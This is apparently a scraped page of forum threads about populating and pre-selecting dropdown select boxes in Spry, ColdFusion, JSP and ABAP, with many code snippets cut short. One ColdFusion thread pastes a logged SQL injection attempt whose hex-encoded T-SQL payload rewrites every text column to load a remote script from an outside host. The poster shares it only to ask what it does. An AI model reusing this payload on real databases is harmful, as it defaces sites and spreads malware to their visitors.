Pre-selecting from Spry Data Select Box

I am new here so sorry if this is in the wrong section/format
I am using Two Spry XML Datasets to populate 2 dropdown boxes with  vehicle makes and the connected model names (there are other fields but for the sake of clarity I will only show these 2). The XML is dynamically generated by PHP/MySQL and works great for initially creating records. The problem I have is when I want to edit my record and so pre-select the data in the dropdown select box. The first box is easy and works fine but the second box only updates when the first is updated using the 'onchange' and I cannot get it to update on load. I can get it to update 'onclick' or other events but I need it to  update the second box when the page loads. Any ideas? I am sure there is a simple solution staring me in the face, but I just can't see it
My code is listed below. I have cut out all the unnecessary code to make it more clear (hopefully)
<script src="../../SpryAssets/xpath.js" type="text/javascript"></script>
<script src="../../SpryAssets/SpryData.js" type="text/javascript"></script>
<script type="text/javascript">
var dsmakes = new Spry.Data.XMLDataSet("xmlgenmake.php", "vehicle/makes");
var dsmodel = new Spry.Data.XMLDataSet("xmlgenmodel.php?xmlmake={dsmakes::make}", "makes/models/model");
<form action="<?php echo $editFormAction; ?>" method="post" name="form1" id="form1">
<span spry:region="dsmakes" id="makeSelector">
  <select spry:repeatchildren="dsmakes" id="makeSelect" name="make" onchange="document.forms[0].modelSelect.disabled = true; dsmakes.setCurrentRowNumber(this.selectedIndex);">
    <option spry:if="'{dsmakes::make}' == '<?php echo $row_Recordset1['make']; ?>'" value="{dsmakes::make}" selected="selected">{dsmakes::make}</option>
    <option spry:if="'{dsmakes::make}' != '<?php echo $row_Recordset1['make']; ?>'" value="{dsmakes::make}">{dsmakes::make}</option>
</span><span spry:region="dsmodel" id="modelSelector">
<select spry:repeatchildren="dsmodel" id="modelSelect" name="model">
  <option spry:if="'{dsmodel::model}' == '<?php echo $row_Recordset1['model']; ?>'" value="{dsmodel::model}" selected="selected">{dsmodel::model}</option>
  <option spry:if="'{dsmodel::model}' != '<?php echo $row_Recordset1['model']; ?>'" value="{dsmodel::model}">{dsmodel::model}</option>

Sorry for not being clear -
The first Spry Select box populates with the Vehicle Makes and selects the stored make from the DB. The second box is supposed to populate with the corresponding Vehicle Models (corresponding to the Vehicle Make in box one) but it initially only populates with the first makes data (not the selected one) if I add:    onfocus="dsmakes.setCurrentRowNumber(this.selectedIndex);     to the first box it works as it should as soon as it receives focus and the second box updates and selects the correct model.
I have tried adding
     function InitPage() {
but I cannot get the second box to update without clicking on the first
It seems there should be s simple solution to this but I cannot see it.

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    a. I have one dual selection box and for that the is div id =' id '
    b.In dual selection box there is two box ie. one is Available and other is Selected. So a user can select one or all using two button.
    c. My requirements is like :
    onclick of a radio button all datas from available side will move to database and that dual box will be hidden.

    Java != Javascript. Please go to some web development board.

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    Mukesh Singh

    Hi Mukesh,
    We can click the Advanced Filter Mode icon on the first to the right of the field name in the Filters area to switch between basic and advanced filters modes. At this time, we can select date and time in the selection box. But there is no such feature for
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    Katherine Xiong
    Katherine Xiong
    TechNet Community Support

  • SPRY data set select auto selected

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    This is what I have right now:
    <html xmlns=""
    <meta http-equiv="Content-Type" content="text/html;
    charset=iso-8859-1" />
    <script type="text/javascript"
    <script type="text/javascript"
    <script type="text/javascript">
    var dsYears = new Spry.Data.XMLDataSet("year.cfm",
    var dsMakes = new Spry.Data.XMLDataSet("{dsYears::url}",
    var dsModels = new Spry.Data.XMLDataSet("{dsMakes::url}",
    <form method="post" name="selectForm">
    <div id="yearSelector" spry:region="dsYears"
    class="Spry:Region dsYears">
    <select spry:repeatchildren="dsYears" name="yearSelect"
    onChange="document.selectForm.makeSelect.disabled =
    <option spry:if="{dsYears::ds_RowNumber} == 0"
    value="{name}" selected="selected">{name}</option>
    <option spry:if="{dsYears::ds_RowNumber} != 0"
    <div id="makeSelector" spry:region="dsMakes"
    class="Spry:Region dsMakes">
    <select spry:repeatchildren="dsMakes" name="makeSelect"
    onChange="document.selectForm.modelSelect.disabled =
    <option spry:if="{dsMakes::ds_RowNumber} == 0"
    value="{name}" selected="selected">{name}</option>
    <option spry:if="{dsMakes::ds_RowNumber} != 0"
    <div id="modelSelector" spry:region="dsModels"
    class="Spry:Region dsModels">
    <select spry:repeatchildren="dsModels"
    <option spry:if="{dsModels::ds_RowNumber} == 0"
    value="{name}" selected="selected">{name}</option>
    <option spry:if="{dsModels::ds_RowNumber} != 0"
    <input type="submit" value="SUBMIT">

    Ok so I figured out how to do it using spry:when, but now the
    problem is when the value is preselected, it is not pre populating
    the next dropdown. So if I choose 2008 in my previous form and
    preselect 2008 on the search results page, the "Makes" dropdown is
    empty until you choose another year in the year dropdown. How do I
    force a refresh of the data when I force a value in the dropdown.
    This is what i tried. still not sure if its even right.
    <form method="post" name="selectForm">
    <div id="yearSelector" spry:region="dsYears"
    class="Spry:Region dsYears">
    <select spry:repeatchildren="dsYears" name="yearSelect"
    onChange="document.selectForm.makeSelect.disabled =
    <option spry:when="'#form.yearSelect#' == '{name}'"
    value="{name}" selected="selected">{name}</option>
    <option spry:when="{dsYears::ds_RowNumber} == 0"
    value="{name}" selected="selected">{name}</option>
    <option spry:when="{dsYears::ds_RowNumber} != 0"

  • Multi-Select Box Not Displaying Values Passed From Grid?

    Coldfusion 8
    I inherited an application and am trying to maintain and improve it... hit a snag today.
    I have a multi-select box that is not displaying what I expect.  The values come from a ColdFusion grid which is based off a database query.
    Here is the code for the select - does not work - nothing is selected:
    <cfselect name="USER_IDS" multiple="true" queryposition="below" selected="USER_IDS" query="ActiveUsersPlus" disabled="#disabled#" value="G_USER_WORK_UNIT_SK" display="G_USER_ID" >
    Now if I change the multiselect to a single select like below - it takes the first item in the field list (from the grid) and selects it in the drop down.
    <cfselect name="USER_IDS" multiple="false" queryposition="below" selected="USER_IDS" query="ActiveUsersPlus" disabled="#disabled#" value="G_USER_WORK_UNIT_SK" display="G_USER_ID" >
    Or if I assign a variable like this and use the multi-select code it seems to work as well.
    testlist = "22,26";
    <cfselect name="USER_IDS" multiple="true" queryposition="below" selected="#testlist#" query="ActiveUsersPlus" disabled="#disabled#" value="G_USER_WORK_UNIT_SK" display="G_USER_ID" >
    I have displayed the value of "User_IDs" in the grid and in the data entry part of the screen to see values of:  22,26
    to make sure that wasn't my issue.
    Do grids and multiselects require something additional?  Any advice on how to resolve?

    Problem was related to some javascript for the select box.  There was a function for a single select box but not a multiple select box - this fixed it: 
    if(theForm.elements[i].type == "select-multiple"){
                        var selectBox = theForm.elements[i];
                        var sbname =;
                        cpvalue = String(eval('' + sbname));
                        var NotifyArray = cpvalue.split(',');
                        for (var j=0; j < selectBox.length; j++) {
                            selectBox[j].selected = false;
                        for (var j=0; j < selectBox.length; j++) {
                            sbvalue = selectBox[j].value;
                            for (var k=0; k < NotifyArray.length; k++){
                                if (sbvalue == NotifyArray[k]){
                                    selectBox[j].selected = true;

  • Populate the JSP's select box from database on jsp load

    hai all,
    can any one help me in knowing how to populate the select box of a jsp
    with data from the database?
    thanks and regards,

    String sQuery = "select id,Name from tablename";
    rs = stmt.executeQuery(sQuery);
    <select name="sltName">
    String sId = rs.getString(1);
    String sName = rs.getString(2);
    <option value="<%=sId %>" > <%=sName %> </option>

  • Pre-populate select box causing query error

    Referring to this thread
    I wanted to pass a value to a dynamic select box (in a url),
    so I changed this:
    <option value="'#SITEID#'" selected=#sid#>
    to this:
    <option value="#SITEID#"<cfif SITEID EQ sid>
    and now get "Error Executing Database Query...... Too few
    parameters. Expected 1."
    The query:
    SELECT <CFLOOP list="#form.parameters#"
    site.coordinates_n, site.coordinates_w,
    FROM site INNER JOIN sitedata
    ON site.siteid = sitedata.siteid
    <CFIF form.siteid gt "">AND sitedata.SITEID in
    <CFIF startdate gt "" AND enddate gt "">AND
    sitedata.monitordate >=
    #startdate# and sitedata.monitordate <=
    <CFIF startdate gt "" AND enddate is "">AND
    sitedata.monitordate >=
    ORDER BY sitedata.monitordate, sitedata.siteid
    I admit I'm not a CF or SQL expert! I'm guessing it has
    something to do
    with the cfloop. Hoping this is something simple I've

    CFQUERYPARAM caught the following attempt at SQL Injection.
    Would someone please explain what they were trying to do?
    best, paul
    On Tue, Jul 22, 2008 at 7:17 AM, <[email protected]>
    > cgi.content_length
    > cgi.http_accept*/*
    > cgi.http_referer
    > cgi.http_user_agentMozilla/4.0 (compatible; MSIE 6.0;
    Windows NT 5.1; SV1)
    > cgi.path_info/index.cfm
    cgi.query_stringfa=ShowItem&ID=2168;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415 245204054207661726368617228323535292C40432076617263686172283430303029204445434C41524520546 1626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D6520667 26F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E69642 0616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D333 5206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437 572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404 3205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205 B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3 C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637 2697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C2 12D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4 04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757 2736F72%20AS%20CHAR(4000));EXEC(@S);
    > cgi.remote_addr220.191.251.211
    > cgi.remote_host220.191.251.211
    > cgi.remote_ident
    > cgi.remote_user
    > cgi.server_port80
    > cfcatch.detail
    > cfcatch.messageInvalid data 2168;DECLARE @S
    @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302 9204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616 D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726 520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7 220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5 0454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7 220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786 5632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223 E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A732 23E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3 C2F7469746C653E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223 E3C2...
    > cfcatch.typeDatabase
    > server.coldfusion.productnameColdFusion Server
    > server.coldfusion.productversion7,0,2,142559
    > server.os.nameWindows 2003
    > server.os.version5.2
    > server.os.buildnumber

  • Putting ResultSet data into select boxes

    I am running a query, and returning the data to a JSP which in turn, places the query data into 3 different select boxes. Each of these three select boxes will contain a different number of values. The query is as follows:
    partQuestionList="SELECT DISTINCT carMake, carModel, partTypeName FROM PARTTYPE, CARSPARTAVAIL";
    Hence, I have three select boxes to display the three types of data. I assume I will need to use a loop of some kind. What is the best way to accomplish this without having code all over the place? Also, what is the best way to make these distinct? Thanks.

    By the is the code I have so far...
         <SELECT name="Model">
              <% for (int x = 0; x<carModel.size(); x++) { %>
              <OPTION><%=carModel.get(x) %></OPTION>
                   <% } %>
    Which will obviously work, but doesnt get rid of the duplicates..

  • How to fill selection box with clientside data?

    i want to make a html form that reads option values from the client.
    Because there are too many data, it's not reasonable for me to design a page which connects to server each time to fill the selection boxes.Instead i want to check if data resides at the clientside, if so fill selection boxes with that data, if not download it for the first time and store it on the client for later local retrieval.In addition i must be able to update that data residing on the client when i want.

    I can tell you some hints. Use cookies to store the information on to the client-side. You can read data from cookies using JavaScript. If you want to store huge amount of data on to the client-side, perhaps this would not be a better idea. In J2EE architecture we often use sessions to store values. You need to design your implementation in such a way that for the first time you fetch all the values from the database and put it in a session, and the next time onwards you can get the values from the session itself and thereby you can avoid going to database each and everytime. Write a Java class which has all the necessary get and set methods and store the object in the session. Using that object reference you can set and get the values from it. I hope this will help you.

  • How can i fill selection box on html form with data on the clientside?

    i want to make a html form that reads option values from the client.
    Because there are too many data, it's not reasonable for me to design a page which connects to server each time to fill the selection boxes.Instead i want to check if data resides at the clientside, if so fill selection boxes with that data, if not download it for the first time and store it on the client for later local retrieval.In addition i must be able to update that data residing on the client when i want.

    Don't see where Java comes into this. Sounds like you'd be using JavaScript on the client.
    A cookie would probably be the only way to save data on the client.

  • Multiple Selection from a data block

    I have a data block returning the names and surnames of employees. Can I select multiple rows from that data block?
    Thank you

    You could put a checkbox on the row and if it is ticked then interpret this as a selected row.
    Sometimes it is useful to store this type of selection in some type of structure like a record group or index by table and process those rows rather than read the data block

  • To add a method on select of a date from a date input field

    I have a input field which is binded to context element, type date. Hence the output screen has a date popup, from which user can select any dates.
    Is it any way i can have a action executed on select of a date value?
    I mean when the user selects a date from the date field an wction should be called.
    As I have chosen it to be input field so at present I have only the option of OnEnter, which is not fulfilling the requirement.

    Hi Pranay,
    Use the Date Navigator instead. It has got the same functionality as Date Picker (this is what you are using) & moreover, you can achieve what you desired. It has got the functions like onDaySelect, onWeekSelect & onMonthSelect & onSelect.
    That will trigger the action what you want.
    Chander Kararia
    # Please close the thread once get the correct answer. Give rewards for answers.

  • Help with building a select box from a query?

    New thread from a topic I started yesterday. From the responses, and a search of other threads, I realized that I was way off base:-) So, I went back and verified that my TomCat setup was alright. After a few tweeks I verified that I could display the index page and successfully run all of the example servlets and jsps. I then built a simple login.jsp and an associated bean to verify a user id and password on an ldap db. That works good. Next, I built a bean which runs a query against the same ldap db and returns a list of last names. What I want to do is use the last names in the bean to populate my select box. At first I was trying to build the html with the list from my bean, i quickly realized you guys didn't like that approach. So, can someone explain, in some detail (because I'm really dense), just how I can return the values from my bean and build a select box with those values.
    BTW Gone to see Lord of The Rings...back in about 5 hours :-)

    Just in general, I prefer knowing how to do things the "old-fashioned way" first before using other tools, because if it comes time for you to take over someone else's code, you'll probably find that they did it the old way and you'll want to understand that. Further, the new ways are based on the old ways for many things.
    Struts is a good system, but unless you have some understanding of the basics, it's probably going to be harder to understand it. If you have the time, I'd say at least go thru one book on JSP/servlets (which should be all about the basics, maybe a slightly older book) and go thru the examples in it.

  • 3 cfgrids on one page.  Columns from grid 1,2 and 3 are swapping the first select box from each grid.

    ColdFusion 11, hot fix 3 installed but did not help. There are no binds.
    This one has been driving me crazy and I have finally figured out that it is the first column in each grid where there is a select box via "valuesdisplay" that is the issue. Select box results are switching grids!
    Example of how it is coded to display:
    Grid 1 - gridcolumn should have a dropdown with 1,2,3
    Grid 2 - gridcolumn should have a dropdown with a,b,c
    Grid 3 - gridcolumn should have a dropdown with x,y,z
    However, the results in the dropdowns in the grids are:
    Grid 1 - x,y,z (should be 1,2,3)
    Grid 2 - 1,2,3 (should be a,b,c)
    Grid 3 - a,b,c (should be x,y,z)
    This only happens with the first dropdown for each grid. Any other columns with dropdowns do not have any issues and do not swap out to the wrong grid.
    Sample of my code from the grids:
    Grid 1:
    <cfgrid name = "evalgrid"
      font="arial" fontsize="12"
      query = "getevalfinal"
      delete = "#deletevalue#">
      <CFGRIDCOLUMN NAME="numberofschools" HEADER="numberofschools"
      BOLD="Yes" ITALIC="No"
      SELECT="Yes" DISPLAY="Yes"
      VALUES = " ,NA,1,2,D"
      VALUESdisplay = "Blank,NA,1,2,D" valuesDelimiter=","
    Second Grid:'
    <cfgrid name = "SecondGrid"
      height="100" width="700"
      font="arial" fontsize="12"
      query = "getsecurity"
      delete = "#deletevalue#"
      <CFGRIDCOLUMN NAME="userrole" HEADER="userrole"
      BOLD="Yes" ITALIC="No"
      SELECT="Yes" DISPLAY="Yes"
      VALUES = "#olduserrole#"
      VALUESdisplay = "#olduserrole#" valuesDelimiter=","
      font="arial" fontsize="12">
    In the above code, userrole values end up being in the wrong grid where numberofschools values should be and vice versa.
    Appreciate any help!

    You may find this article useful: [].

  • "select distinct" from itab data?

    Hi anyone know how to do a "select distinct" from itab data and do some calculation.
    For example:
    This is my itab result data:
    Col1 | Col2    | Col3 | col4
    123  |000010 |a      |  10.00
    123  |000010 |b      |  2.00
    123  |000010 |c      |  3.00
    123  |000020 |a      |  10.50
    123  |000020 |b      |  2.50
    123  |000020 |c      |  3.50
    123  |000030 |a      |  50.00
    123  |000030 |b      |  6.00
    123  |000030 |c      |  7.00
    I need to do some calculation of a value a - (b value + c value) = x value and x value update back to value a col where the value of a, b, c must be match of col2.
    ideally return 000010: x value =  5.00
                        000020: x value = 4.50
                        000030: x value = 37.00
    How can I able to differential the data from cols2?

    u can do this:
    loop at itab.
      loop at itab into wa_itab where col2 = itab-col2.   " process all 10's, 20's ur codition chk n calculations  here          " populate the data into new itab
      delete itab where col2 = itab-col2.                      " after processing delete them.
    do the calculations and populate into new internal table in the loop itself.

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